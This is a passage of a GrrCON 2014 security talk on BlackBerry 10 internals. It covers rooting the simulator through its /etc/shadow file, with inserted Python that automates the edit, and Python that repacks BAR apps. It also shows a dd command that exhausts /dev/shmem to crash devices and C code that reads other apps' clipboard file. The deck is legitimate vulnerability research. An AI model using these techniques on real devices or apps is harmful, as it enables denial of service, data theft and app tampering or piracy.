Picking Blackberries GrrCON 2014 Presentation
1 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted.
GRRCON 2014
Picking Blackberries
THOMAS RICHARDS
About Me
• Thomas Richards
• Security Consultant @ Cigital, Inc
• @g13net - Twitter
• Web App, Mobile, Red Team
assessments
• Organizer for BsidesROC
• Presented previously at DerbyCON,
GrrCON, CarolinaCON, BsidesSF
ToC
• 0x1 Intro + History
• 0x2 BB10 Platform Security
• 0x3 BB10 Simulator
• 0x4 BB10 Apps
• 0x5 Misc
0x1 Intro
Blackberry
• What is Blackberry?
o Formerly Research In Motion (RIM)
o Canadian
o Started with pagers
• Introduced its first smartphone to receive corporate email in April 2000
• Very popular with governments and businesses
o Until about 2007
BBOS
• Original proprietary OS used on
Blackberry handsets
• Ran Java Apps
• If you owned a Blackberry before 2013
this is what you used
• Last version released is 7.1
BB10
• In an attempt to stay relevant and
compete against iOS and Android, BB
released BB10
• Radical departure from previous OSes
• Based on QNX
• What happened to BB8 and BB9?
QNX
• Commercial Unix-like real-time operating
system.
• Originally targeted at the embedded
systems market
• First version released in 1982
QNX Cont.
• Micro-kernel Based
• Real-Time Operating System
• POSIX compliant
QNX Architecture
Acquired by BB
• QNX was bought by BB in 2010
• The next day, access to the source code
was restricted
• The Blackberry Playbook was the first
BB device to run a QNX based OS
• Tablet OS
Playbook
Z10
• First BB10 based phone
• Released in 2013
• Did not include a hardware keyboard
Insert picture of Z10
Tablet OS Vs BB10
• Aside from UI changes
• Android Applications
o Wha????
Android on BB10
• Full Android Environment and runtime
• Originally Apps needed to be “wrapped”
• Newer versions support traditional APKs
• App Stores?
o Play Store was not there
o BB announced partnership with Amazon to
include Amazon Store in BB10.3
0x2 BB10 Platform Security
Landscape
• The Playbook was rooted early on, BB
was determined to prevent that on new
BB10 phones
• Introduced a number of hardware and
software security measures to keep the
devices secure and locked
Rooting Playbook
• Took advantage of unsigned backup files
• Modify the backup to edit the Samba config, then restore it
• Blackberry patched this.
• Dingleberry
System Protection
• To prevent exploits:
o ASLR is enabled
o Stack Canaries
o DEP
Hardware Protection
• Firmware images are signed
• Blackberry controls both the hardware
and software
• Keys to verify the firmware images are
embedded
Secure Boot
Application Sandboxing
• Done by filesystem permissions
• Enforced by authman
• Memory is also contained
Authman
• Authorization Manager
• Resource manager which handles
requests from processes
• Apps send requests through launcher
• Authman verifies the apps have
permission to access the service or
component they are requesting
Dual Persona
• Blackberry Balance
o Work and Personal “spaces”
o Enforced by filesystem permissions and
authman
o Work apps are separate from personal ones
Balance Boundaries
• When I had access to BB10 in an
enterprise environment….
• The Workspace was able to access files
and information in the personal space
o Email information, clipboard
o These files were world-readable
0x3 BB10 Simulator
Developing for BB10
• BB offers a simulator to test apps without
needing a BB10 device
• VMware image
• x86
o Actual BB10 devices are ARM
No Registration Required!
Simulator
Couple of Caveats
• Applications compiled for the Sim need
to be recompiled for a device
o Symbols get stripped when compiled for a
device
• No root access*
• No Blackberry World access*
Rooting the Simulator
• Wanted to start digging around at the
internals of the system.
• Already had shell access
• How to get root?
Editing the FS
• Needed to mount vmware disk image in
another VM in order to modify the disk
• Linux only has read-only support for the
QNX6 filesystem (the one BB10 uses)
• Solution?
QNX Neutrino VMware Image
QNX Neutrino VMware Image
• No registration needed
• QNX environment which supports QNX6!
• Profit!
How to root
• Add BB10 sim disk to QNX SDP VM
• Boot
• Mount the disk
• Edit /etc/shadow to include a root entry
o I copied the devuser entry from the QNX
image so I knew the password
• Woot.
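The /etc/shadow step above, as an added example that is not code from the talk: given the text of the QNX SDP image's /etc/shadow and of the simulator's /etc/shadow (read off the mounted disk however you reach it), it returns the simulator file with a root line carrying devuser's hash, the same edit the author made by hand. Assumptions: QNX shadow lines are "name:hash:..." with the user name first and the hash second, and every hash in the sample data is a constructed placeholder, not a real credential.

```python
"""Copy devuser's shadow entry into the BB10 simulator's /etc/shadow as root.

Added example; assumes the "name:hash:..." shadow layout. Sample hashes used
with it are constructed placeholders."""

LOCKED = ("", "*", "!", "x")   # second fields that carry no usable hash


def find_entry(shadow_text, user):
    """Return the colon-split fields of user's line, or None if absent or locked."""
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if fields[0] == user and len(fields) >= 2 and fields[1] not in LOCKED:
            return fields
    return None


def add_root_entry(sdp_shadow, sim_shadow, source_user="devuser"):
    """Copy source_user's entry from sdp_shadow into sim_shadow under the name
    root, replacing any existing root line and leaving everything else as is.
    Returns the new file text; raises if the source entry is missing/locked."""
    template = find_entry(sdp_shadow, source_user)
    if template is None:
        raise ValueError("no usable %s entry in the SDP shadow file" % source_user)
    # keep every field after the name (hash, ageing fields) exactly as on the SDP image,
    # so the password you already know for devuser now works for root
    root_line = ":".join(["root"] + template[1:])

    out, replaced = [], False
    for line in sim_shadow.splitlines():
        if line.split(":")[0] == "root":
            out.append(root_line)      # overwrite a locked or existing root entry
            replaced = True
        else:
            out.append(line)
    if not replaced:
        out.append(root_line)          # no root line at all: append one
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    # usage: python3 shadow_root.py <sdp_shadow_copy> <sim_shadow_copy>
    # (rewrites the second file; copy it back to the mounted simulator disk)
    import sys
    sdp_path, sim_path = sys.argv[1], sys.argv[2]
    with open(sdp_path) as f:
        sdp = f.read()
    with open(sim_path) as f:
        sim = f.read()
    with open(sim_path, "w") as f:
        f.write(add_root_entry(sdp, sim))
```

The locked-entry check matters: if the SDP copy of devuser ever ships with "*" or an empty second field there is nothing to copy, and silently writing that into the simulator would lock root out rather than open it.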
Shadow file
Blackberry World Access
• On Beta releases of the Sim, BBWorld
access was restricted
• Two things were needed:
o Blackberry ID
o Valid Hardware ID
• Found a way to spoof it and gain
BBWorld access
However…
• It appears BB has made my efforts futile
• BBWorld works on version 10.0.09-2372
of the simulator
• Without changes ?
Next Steps
• Explore file system
• See Zach Lanier and Ben Nell’s talk from
CanSecWest
0x4 BB10 Apps
Write apps in…
• Native
o C/C++
• HTML5
• Adobe AIR
• Android!
BB10 App Packaging
• BAR files
• Similar to APKs, basically signed ZIP
archives
• Will contain two directories, META-INF
and native (or android)
Exploded BAR
META-INF
• Contains MANIFEST.MF
• Package Information
• Checksums
• Etc.
Native/
• bar-descriptor.xml
• Application binary and assets
Exploring BBWorld
• With World access on the rooted
simulator
• We can start to explore and pick apart
apps on the market
Casual Observations
• Want to do mobile banking?
• Only two US banks are present:
oWells Fargo
o BoA
• Lots of European and Canadian Banks!
Oh and…
• Of course Bitcoin
Details, Details
Reviews
Sachesi
• Open source tool to extract, search,
(un)install BB firmware and applications
• Also can backup, restore, wipe, and
nuke a device
• New version has access to browse BB
World
AppWorld
Firmware
Installing Apps
Repacking Apps
• As stated before, each BAR file will
contain META-INF/ and native/ (or
android/) directories.
• When an app is installed on a device, the
BAR file gets removed.
• What is left behind…..
Yay….
• The public/ dir isn’t needed
• With root access to the simulator
• With BB World running on the simulator
• …
• We can extract apps from the simulator
for repacking (malicious modification or piracy)
Quick Note
• Pretty sure third party BB app stores
aren’t a thing.
• This is purely academic
How to Repack A BB App
• Sign up and get a BB Developer Cert
o Free!
o Incredibly long process…not detailing here
• Download app from World in simulator
• Extract installed directory
• Add META-INF/ and native/ to a new .BAR file (just a ZIP)
• Sign .BAR with your cert
• Profit!
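The BAR layout from the packaging slides and the repack steps just listed, as an added example that is not code from the talk and not BlackBerry's packager or blackberry-signer: it builds a .bar from an extracted native/ tree, regenerating META-INF/MANIFEST.MF with per-asset digests, and checks an existing .bar against its manifest. Assumptions: the manifest keys Archive-Asset-Name / Archive-Asset-SHA-512-Digest (base64) and Package-Name follow the BAR manifest layout as I know it; the app tree is constructed; and the signature files blackberry-signer adds under META-INF/ are deliberately not reproduced.

```python
"""Build, inspect and digest-check a BlackBerry BAR (a ZIP with META-INF/ and native/).

Added example. Manifest key names are an assumption about the BAR format;
SAMPLE_APP is a constructed tree, not a real app. Signing is not reproduced."""
import base64
import hashlib
import io
import zipfile

# Constructed stand-in for what is left in the install directory on the simulator
# (the two things a BAR needs: native/ with bar-descriptor.xml plus the binary and assets).
SAMPLE_APP = {
    "native/bar-descriptor.xml": b"<qnx><id>com.example.notes</id><name>Notes</name></qnx>",
    "native/Notes": b"\x7fELF constructed placeholder, not a real binary",
    "native/assets/icon.png": b"\x89PNG constructed placeholder",
}


def sha512_b64(data):
    return base64.b64encode(hashlib.sha512(data).digest()).decode()


def build_manifest(package_name, files):
    """MANIFEST.MF: a header block, then one Name/Digest pair per asset."""
    lines = ["Archive-Manifest-Version: 1.1", "Package-Name: %s" % package_name, ""]
    for name in sorted(files):
        lines += ["Archive-Asset-Name: %s" % name,
                  "Archive-Asset-SHA-512-Digest: %s" % sha512_b64(files[name]), ""]
    return "\n".join(lines).encode()


def build_bar(package_name, files):
    """Unsigned .bar bytes: manifest first, then every asset under native/ (or android/)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("META-INF/MANIFEST.MF", build_manifest(package_name, files))
        for name, data in files.items():
            z.writestr(name, data)
    return buf.getvalue()


def parse_manifest(text):
    """Return (headers, {asset_name: digest}) from MANIFEST.MF text."""
    headers, assets, current = {}, {}, None
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "Archive-Asset-Name":
            current = value
        elif key == "Archive-Asset-SHA-512-Digest" and current:
            assets[current] = value
            current = None
        else:
            headers[key] = value
    return headers, assets


def check_digests(bar_bytes):
    """Names of zip entries whose bytes do not match the manifest, or are not listed in it."""
    bad = []
    with zipfile.ZipFile(io.BytesIO(bar_bytes)) as z:
        _, assets = parse_manifest(z.read("META-INF/MANIFEST.MF").decode())
        for info in z.infolist():
            if info.filename.startswith("META-INF/") or info.is_dir():
                continue
            if assets.get(info.filename) != sha512_b64(z.read(info.filename)):
                bad.append(info.filename)
    return bad


def replace_entry(bar_bytes, name, data):
    """Swap one entry (e.g. the app binary) WITHOUT touching META-INF: the naive repack."""
    src = zipfile.ZipFile(io.BytesIO(bar_bytes))
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            dst.writestr(info.filename, data if info.filename == name else src.read(info.filename))
    return out.getvalue()
```

The point the two checks make: editing the binary inside an existing .bar leaves the manifest digests stale, so a repack has to regenerate META-INF/MANIFEST.MF and then be signed with your own developer cert, which is exactly why the result installs as your app rather than the original author's.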
Creating the Bar
Signing the Bar
Sachesi again
• Debug token is not needed to install
BARs onto a BB
• They can be sideloaded with Sachesi
Installed BAR
App on Device
Proxy Settings
• So you want to fiddle with an app that is
running on the device
• BB10 contains settings to enable a proxy
and install root CA certificates (like
Burp's)
Proxy Settings
How to Import a Cert
Traffic in Burp
0x5 Misc
Device DoS
• There are lots of QNX documents
available online
• Browsing around, /dev/shmem took
interest
/dev/shmem
Exploit
• /dev/shmem is QNX's shared-memory namespace; objects created there
are backed by RAM, so filling it fills the device's memory
• Using dd, an unprivileged app can just fill all of it
• dd if=/dev/zero of=/dev/shmem/dos bs=1024 count=1000000000
• Device will require a reboot
Reporting
• Told BB about it, this was their response:
• While it would be ideal to have the
system be more stable under intentional
resource exhaustion by non-privileged
apps, that's an area for future design
changes and not a vulnerability we would
release a security update for.
• TL;DR – We’ll look into it later
The Clipboard
• World-readable and writeable directory
• Apps can write files outside of their
sandbox
• Any app can read the clipboard file
directly, without going through a
clipboard API (as Android and iOS require)
Insert Picture of balls created
Code for scraping clipboard
// open the shared clipboard file directly; no clipboard API involved
char content[250];
FILE *fp = fopen("/accounts/1000/clipboard/text.plain", "r");
if (fp != NULL) {
    // bounded read: "%249s" leaves room for the NUL, a bare "%s" would overflow content;
    // pass the array itself, not &content (that is a char (*)[250], not a char *)
    int rc = fscanf(fp, "%249s", content);
    fclose(fp);
}
Blackberry-connect
• Shell access to a device is very limited.
• Only SSH
• Must use blackberry-connect to push
public key
• Must auth with private key
• devuser
Interesting bits